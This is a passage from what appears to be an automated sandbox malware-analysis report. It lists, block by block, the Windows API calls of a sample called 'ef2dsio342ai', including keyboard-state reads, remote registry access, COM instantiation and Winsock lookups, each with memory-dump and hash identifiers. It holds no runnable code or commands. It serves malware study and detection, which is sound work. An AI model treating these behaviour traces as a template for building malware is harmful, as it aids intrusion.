                                                                                                      • GetKeyState.USER32(0000005B), ref: 00D7AA78
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: State$Async$Keyboard
                                                                                                      • String ID:
                                                                                                      • API String ID: 541375521-0
                                                                                                      • Opcode ID: f96532c9b48f6889858718a750794017b4e8fa0e971e2403255a576a150b3780
                                                                                                      • Instruction ID: ef92929d77a39a5adaea8769a05186b169afd20fbced6d89680b7ab2e0f980ba
                                                                                                      • Opcode Fuzzy Hash: f96532c9b48f6889858718a750794017b4e8fa0e971e2403255a576a150b3780
                                                                                                      • Instruction Fuzzy Hash: 1C51F62090478869EB35E7B488147AEBFB49F52340F4CC58AD5CA5B1C2FB549A4CCB73
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetDlgItem.USER32(?,00000001), ref: 00D76571
                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 00D7658A
                                                                                                      • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00D765E8
                                                                                                      • GetDlgItem.USER32(?,00000002), ref: 00D765F8
                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 00D7660A
                                                                                                      • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00D7665E
                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00D7666C
                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 00D7667E
                                                                                                      • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00D766C0
                                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 00D766D3
                                                                                                      • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00D766E9
                                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00D766F6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$ItemMoveRect$Invalidate
                                                                                                      • String ID:
                                                                                                      • API String ID: 3096461208-0
                                                                                                      • Opcode ID: a5a629c358908737f1d2453b5fa8589dcd40e31e1807bc662cc1ea10b8c47fa5
                                                                                                      • Instruction ID: 8dc0785b51f7fb699f0408416c2828c00040f79dcb93cafcc06f4bdb9dba39f8
                                                                                                      • Opcode Fuzzy Hash: a5a629c358908737f1d2453b5fa8589dcd40e31e1807bc662cc1ea10b8c47fa5
                                                                                                      • Instruction Fuzzy Hash: EF511171A00719AFDF08CF68DD85AAE7BB6FB48300F548129F51AE7694E770DD048B60
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 00D11802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00D11488,?,00000000,?,?,?,?,00D1145A,00000000,?), ref: 00D11865
                                                                                                      • DestroyWindow.USER32(?), ref: 00D11521
                                                                                                      • KillTimer.USER32(00000000,?,?,?,?,00D1145A,00000000,?), ref: 00D115BB
                                                                                                      • DestroyAcceleratorTable.USER32(00000000), ref: 00D529D4
                                                                                                      • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00D1145A,00000000,?), ref: 00D52A02
                                                                                                      • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00D1145A,00000000,?), ref: 00D52A19
                                                                                                      • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00D1145A,00000000), ref: 00D52A35
                                                                                                      • DeleteObject.GDI32(00000000), ref: 00D52A47
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 641708696-0
                                                                                                      • Opcode ID: 2a598043695a1f3fbe1cd2e8ca95966ef12d143e8cf4defc41b86cd1cb70ce88
                                                                                                      • Instruction ID: bb5f39e0b3049ce3aef13780d4d85c9d62cde408e3c8a59255ea167def67d45b
                                                                                                      • Opcode Fuzzy Hash: 2a598043695a1f3fbe1cd2e8ca95966ef12d143e8cf4defc41b86cd1cb70ce88
                                                                                                      • Instruction Fuzzy Hash: 29619935500711EFDB35AF14E989B7977B6FB81312F184518E9838AA60CB70E988DFB0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 00D121E4: GetWindowLongW.USER32(?,000000EB), ref: 00D121F2
                                                                                                      • GetSysColor.USER32(0000000F), ref: 00D12102
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ColorLongWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 259745315-0
                                                                                                      • Opcode ID: 3ada8d6b95801d9b78cab477ae82c65f0ac16865f9603745a99ad17f964c2ba5
                                                                                                      • Instruction ID: 54ef9afa0693209b88f6e86642fcdb1a3c497d47078a2782fd5b86a155f025b4
                                                                                                      • Opcode Fuzzy Hash: 3ada8d6b95801d9b78cab477ae82c65f0ac16865f9603745a99ad17f964c2ba5
                                                                                                      • Instruction Fuzzy Hash: 90417071140740BFDB249F28AC44BFA3766EB46361F184645FEA2872E1CB729DD29B31
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 00D184B7: _wcslen.LIBCMT ref: 00D184CA
                                                                                                      • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00D71032
                                                                                                      • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00D7104E
                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00D7106A
                                                                                                      • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00D71094
                                                                                                      • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 00D710BC
                                                                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00D710C7
                                                                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00D710CC
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                                                      • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                      • API String ID: 323675364-22481851
                                                                                                      • Opcode ID: b15f97ed8dce4b270b6c2058c1ad32b75e0d4fb33bc3352af4b4da8ab47e905e
                                                                                                      • Instruction ID: ca5564640d9c71174bcf9c16abb4c4418b2eb21cddff13f67c24f07cd10fede1
                                                                                                      • Opcode Fuzzy Hash: b15f97ed8dce4b270b6c2058c1ad32b75e0d4fb33bc3352af4b4da8ab47e905e
                                                                                                      • Instruction Fuzzy Hash: 8841E876810229ABDF11EBA4EC959EDB7B9FF04710F04416AF905A32A1EB719D44CBB0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00DA499A
                                                                                                      • CreateCompatibleDC.GDI32(00000000), ref: 00DA49A1
                                                                                                      • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00DA49B4
                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00DA49BC
                                                                                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 00DA49C7
                                                                                                      • DeleteDC.GDI32(00000000), ref: 00DA49D1
                                                                                                      • GetWindowLongW.USER32(?,000000EC), ref: 00DA49DB
                                                                                                      • SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 00DA49F1
                                                                                                      • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 00DA49FD
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                      • String ID: static
                                                                                                      • API String ID: 2559357485-2160076837
                                                                                                      • Opcode ID: fae29e18a776a6802c6f69cf43a4f6719a66fcd3995d1424c3363e91476daa22
                                                                                                      • Instruction ID: e5e873add7feee7b7d51f17293df2d88effe26af2bafd00f7916253d2ca3bc2a
                                                                                                      • Opcode Fuzzy Hash: fae29e18a776a6802c6f69cf43a4f6719a66fcd3995d1424c3363e91476daa22
                                                                                                      • Instruction Fuzzy Hash: 92316972100219ABDF119FA4DC08FDB3BA9FF4A324F140215FA6AE61A0D775D820DBB4
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • VariantInit.OLEAUT32(?), ref: 00D945B9
                                                                                                      • CoInitialize.OLE32(00000000), ref: 00D945E7
                                                                                                      • CoUninitialize.OLE32 ref: 00D945F1
                                                                                                      • _wcslen.LIBCMT ref: 00D9468A
                                                                                                      • GetRunningObjectTable.OLE32(00000000,?), ref: 00D9470E
                                                                                                      • SetErrorMode.KERNEL32(00000001,00000029), ref: 00D94832
                                                                                                      • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00D9486B
                                                                                                      • CoGetObject.OLE32(?,00000000,00DB0B64,?), ref: 00D9488A
                                                                                                      • SetErrorMode.KERNEL32(00000000), ref: 00D9489D
                                                                                                      • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00D94921
                                                                                                      • VariantClear.OLEAUT32(?), ref: 00D94935
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                                                      • String ID:
                                                                                                      • API String ID: 429561992-0
                                                                                                      • Opcode ID: 7e0f22805ab4ae6c31e920e27995c656bb47f387fc9a07e40db047985a265e6d
                                                                                                      • Instruction ID: a259e6f0eeaefab16609e11db8d6831941005a3102bd9cda74c62a73a40cbe91
                                                                                                      • Opcode Fuzzy Hash: 7e0f22805ab4ae6c31e920e27995c656bb47f387fc9a07e40db047985a265e6d
                                                                                                      • Instruction Fuzzy Hash: E2C12771604305AF8B00DF64C884D6BBBE9FF89748F14495DF98A9B251DB30ED46CBA2
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • CoInitialize.OLE32(00000000), ref: 00D8844D
                                                                                                      • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00D884E9
                                                                                                      • SHGetDesktopFolder.SHELL32(?), ref: 00D884FD
                                                                                                      • CoCreateInstance.OLE32(00DB0CD4,00000000,00000001,00DD7E8C,?), ref: 00D88549
                                                                                                      • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00D885CE
                                                                                                      • CoTaskMemFree.OLE32(?,?), ref: 00D88626
                                                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 00D886B1
                                                                                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00D886D4
                                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 00D886DB
                                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 00D88730
                                                                                                      • CoUninitialize.OLE32 ref: 00D88736
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                                      • String ID:
                                                                                                      • API String ID: 2762341140-0
                                                                                                      • Opcode ID: 24251598bf55db8b4e384274720d92c7507c05b78ee111ba8b4fad1934a508d0
                                                                                                      • Instruction ID: d67e638c2419d389b79d472fe697d5c188cfc30d3830e84aa38d77c073c1d4e7
                                                                                                      • Opcode Fuzzy Hash: 24251598bf55db8b4e384274720d92c7507c05b78ee111ba8b4fad1934a508d0
                                                                                                      • Instruction Fuzzy Hash: F2C10A75A00209AFCB14DFA4C884DAEBBF9FF49304B548498E41ADB761DB30ED45DBA0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • __lock.LIBCMT ref: 1000AA89
                                                                                                        • Part of subcall function 10007B9E: __mtinitlocknum.LIBCMT ref: 10007BB0
                                                                                                        • Part of subcall function 10007B9E: __amsg_exit.LIBCMT ref: 10007BBC
                                                                                                        • Part of subcall function 10007B9E: EnterCriticalSection.KERNEL32(00000000,?,1000DA27,0000000D,10020508,00000008,1000D9C0,00000000,00000000,00000001,00000000,?,0000001C,?,10004D4B,1000471D), ref: 10007BC9
                                                                                                      • @_EH4_CallFilterFunc@8.LIBCMT ref: 1000AAA7
                                                                                                      • __calloc_crt.LIBCMT ref: 1000AAC0
                                                                                                      • @_EH4_CallFilterFunc@8.LIBCMT ref: 1000AADB
                                                                                                      • GetStartupInfoW.KERNEL32(?,100203C0,00000064), ref: 1000AB30
                                                                                                      • __calloc_crt.LIBCMT ref: 1000AB7B
                                                                                                      • GetFileType.KERNEL32(00000001), ref: 1000ABC2
                                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 1000ABFB
                                                                                                      • GetStdHandle.KERNEL32(-000000F6), ref: 1000ACB4
                                                                                                      • GetFileType.KERNEL32(00000000), ref: 1000ACC6
                                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(-100249D4,00000FA0), ref: 1000ACFB
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1931555351.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1931530312.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931580966.000000001001B000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931602166.0000000010022000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931621641.0000000010026000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_10000000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSection$CallCountFileFilterFunc@8InitializeSpinType__calloc_crt$EnterHandleInfoStartup__amsg_exit__lock__mtinitlocknum
                                                                                                      • String ID:
                                                                                                      • API String ID: 301580142-0
                                                                                                      • Opcode ID: 53444270bfeeec631928fc85f24bb808554e0e2f21295a1cf9ddf604f125cd18
                                                                                                      • Instruction ID: 908717bc0c9c9c4bec92813ab49e012733d21e125752c40b41d3a1c49dcf7e0b
                                                                                                      • Opcode Fuzzy Hash: 53444270bfeeec631928fc85f24bb808554e0e2f21295a1cf9ddf604f125cd18
                                                                                                      • Instruction Fuzzy Hash: 9791B3719057558FFB14CF64C88099EBBF0EF0A2A4B25436ED4A6AB3D5D7349883CB50
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00DA5E63
                                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00DA5E74
                                                                                                      • CharNextW.USER32(00000158), ref: 00DA5EA3
                                                                                                      • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00DA5EE4
                                                                                                      • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00DA5EFA
                                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00DA5F0B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$CharNext
                                                                                                      • String ID:
                                                                                                      • API String ID: 1350042424-0
                                                                                                      • Opcode ID: ebac758eac85d5572644d3a2c1d214e4285d9e64a40371f94ca7be26cb2a11a4
                                                                                                      • Instruction ID: 3a07c432ce083011bd2418a10debaf1e88362ef759792caf433b0dacdf17d08c
                                                                                                      • Opcode Fuzzy Hash: ebac758eac85d5572644d3a2c1d214e4285d9e64a40371f94ca7be26cb2a11a4
                                                                                                      • Instruction Fuzzy Hash: 36618B74901209EFDF119F94DC84AFE7BB9EF0A720F188109F962AA294D774DA41DB70
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00D7033F
                                                                                                      • SafeArrayAllocData.OLEAUT32(?), ref: 00D70398
                                                                                                      • VariantInit.OLEAUT32(?), ref: 00D703AA
                                                                                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 00D703CA
                                                                                                      • VariantCopy.OLEAUT32(?,?), ref: 00D7041D
                                                                                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 00D70431
                                                                                                      • VariantClear.OLEAUT32(?), ref: 00D70446
                                                                                                      • SafeArrayDestroyData.OLEAUT32(?), ref: 00D70453
                                                                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00D7045C
                                                                                                      • VariantClear.OLEAUT32(?), ref: 00D7046E
                                                                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00D70479
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                      • String ID:
                                                                                                      • API String ID: 2706829360-0
                                                                                                      • Opcode ID: 63ba2d485f854d6f0d031a25f0e18ab6d3997b063205ddf889765b0ee903e84a
                                                                                                      • Instruction ID: 14d3b769202c15b9471a34a89824deb6c69ca40c801c4dcd993559b401caa523
                                                                                                      • Opcode Fuzzy Hash: 63ba2d485f854d6f0d031a25f0e18ab6d3997b063205ddf889765b0ee903e84a
                                                                                                      • Instruction Fuzzy Hash: 4A413D75A00219EFCB00DFA4D8449EEBFB9EF58354F008469E95AE7261DB70A945CBB0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 00D12441: GetWindowLongW.USER32(00000000,000000EB), ref: 00D12452
                                                                                                      • GetSystemMetrics.USER32(0000000F), ref: 00DAA926
                                                                                                      • GetSystemMetrics.USER32(0000000F), ref: 00DAA946
                                                                                                      • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00DAAB83
                                                                                                      • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00DAABA1
                                                                                                      • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00DAABC2
                                                                                                      • ShowWindow.USER32(00000003,00000000), ref: 00DAABE1
                                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00DAAC06
                                                                                                      • DefDlgProcW.USER32(?,00000005,?,?), ref: 00DAAC29
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                                                      • String ID:
                                                                                                      • API String ID: 1211466189-3916222277
                                                                                                      • Opcode ID: 5c5413bb2f5499836aae0db2dc4e0c4360f1057bcd583e09f52153f41ac12cc7
                                                                                                      • Instruction ID: 545d622a2819fa7a15f8a4787b95d16343b03d3a256967bd2dcbc4cf00314dfa
                                                                                                      • Opcode Fuzzy Hash: 5c5413bb2f5499836aae0db2dc4e0c4360f1057bcd583e09f52153f41ac12cc7
                                                                                                      • Instruction Fuzzy Hash: 8DB17935600219DFDF14CF6CC9857AE7BF2BF46701F198169EC899A295D730A980CB72
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • WSAStartup.WSOCK32(00000101,?), ref: 00D90F19
                                                                                                      • inet_addr.WSOCK32(?), ref: 00D90F79
                                                                                                      • gethostbyname.WSOCK32(?), ref: 00D90F85
